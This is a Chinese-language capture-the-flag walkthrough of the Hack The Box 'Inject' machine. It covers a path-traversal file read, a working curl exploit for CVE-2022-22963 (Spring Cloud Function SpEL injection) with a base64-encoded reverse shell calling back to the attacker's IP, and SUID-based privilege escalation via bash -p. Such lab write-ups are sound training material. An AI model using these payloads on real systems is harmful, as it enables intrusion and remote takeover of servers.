HTB靶场:简单inject
1、进入靶场,连接vpn后开启靶机 inject
2、nmap扫描一下靶机
nmap -v -A 10.10.11.*
扫描后显示服务和端口信息8080和22
3、打开web服务
1)有上传文件功能 简单上传了几个文件(txt,img等 上传过程根据参数简单测试了rce和注入发现无回显并且不对猜测可能不是此考点、转换思路上传的图片)
2)上传图片会显示路径。
3)看到有路径猜测是否可跨目录文件包含,试后发现有并且有回显
/show_image?img=../../../../../../../etc/passwd
4)包含可直接显示目录 最终找到web目录pom.xml看看有什么依赖
5)知识点 Spel表达式注入(3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2)CVE-2022-22963、直接打的反弹shell的payload
curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTEvNjY4OCAwPiYx}|{base64,-d}|{bash,-i} ")' --data-raw 'data' -v
6)以上base64换成自己地址、监听端口6688
7)发现无权限查看目录
8)提权(推荐一个linux提权 https://pentestlab.blog/2017/09/25/suid-executables/)
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
bash -p
发现有bash可用
直接 bash -p 提权成功
9)寻找flag root目录下/文章来源:https://www.toymoban.com/news/detail-488809.html
cat /home/phil/user.txt
cat /root/root.txt
文章来源地址https://www.toymoban.com/news/detail-488809.html
到了这里,关于HTB靶场:简单inject的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!